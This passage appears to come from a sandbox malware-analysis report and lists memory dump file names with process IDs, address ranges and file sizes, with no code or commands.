                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/4860-0-0x00007FFD9E693000-0x00007FFD9E695000-memory.dmp

                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/4860-2-0x00007FFD9E690000-0x00007FFD9F151000-memory.dmp

                                                                                    Filesize

                                                                                    10.8MB

                                                                                  • memory/4908-15790-0x000001F4CCDC0000-0x000001F4CCDC6000-memory.dmp

                                                                                    Filesize

                                                                                    24KB

                                                                                  • memory/4908-15787-0x000001F4CCD80000-0x000001F4CCD8A000-memory.dmp

                                                                                    Filesize

                                                                                    40KB

                                                                                  • memory/4908-15791-0x000001F4CCDD0000-0x000001F4CCDDA000-memory.dmp

                                                                                    Filesize

                                                                                    40KB

                                                                                  • memory/4908-15782-0x000001F4CCB60000-0x000001F4CCB7C000-memory.dmp

                                                                                    Filesize

                                                                                    112KB

                                                                                  • memory/4908-15783-0x000001F4CCB80000-0x000001F4CCC35000-memory.dmp

                                                                                    Filesize

                                                                                    724KB

                                                                                  • memory/4908-15784-0x000001F4CC910000-0x000001F4CC91A000-memory.dmp

                                                                                    Filesize

                                                                                    40KB

                                                                                  • memory/4908-15786-0x000001F4CCDA0000-0x000001F4CCDBC000-memory.dmp

                                                                                    Filesize

                                                                                    112KB

                                                                                  • memory/4908-15789-0x000001F4CCD90000-0x000001F4CCD98000-memory.dmp

                                                                                    Filesize

                                                                                    32KB

                                                                                  • memory/4908-15788-0x000001F4CCDE0000-0x000001F4CCDFA000-memory.dmp

                                                                                    Filesize

                                                                                    104KB

                                                                                  • memory/5412-15754-0x000001F37DF90000-0x000001F37DFB2000-memory.dmp

                                                                                    Filesize

                                                                                    136KB

                                                                                  • memory/5992-6475-0x00000000055A0000-0x000000000567C000-memory.dmp

                                                                                    Filesize

                                                                                    880KB

                                                                                  • memory/5992-6474-0x0000000000E20000-0x0000000000E94000-memory.dmp

                                                                                    Filesize

                                                                                    464KB

                                                                                  • memory/6300-11281-0x0000000000400000-0x000000000062C000-memory.dmp

                                                                                    Filesize

                                                                                    2.2MB

                                                                                  • memory/6300-15681-0x0000000000400000-0x000000000062C000-memory.dmp

                                                                                    Filesize

                                                                                    2.2MB

                                                                                  • memory/7092-10749-0x0000000000400000-0x000000000062C000-memory.dmp

                                                                                    Filesize

                                                                                    2.2MB

                                                                                  • memory/8076-15707-0x0000000140000000-0x0000000140004248-memory.dmp

                                                                                    Filesize

                                                                                    16KB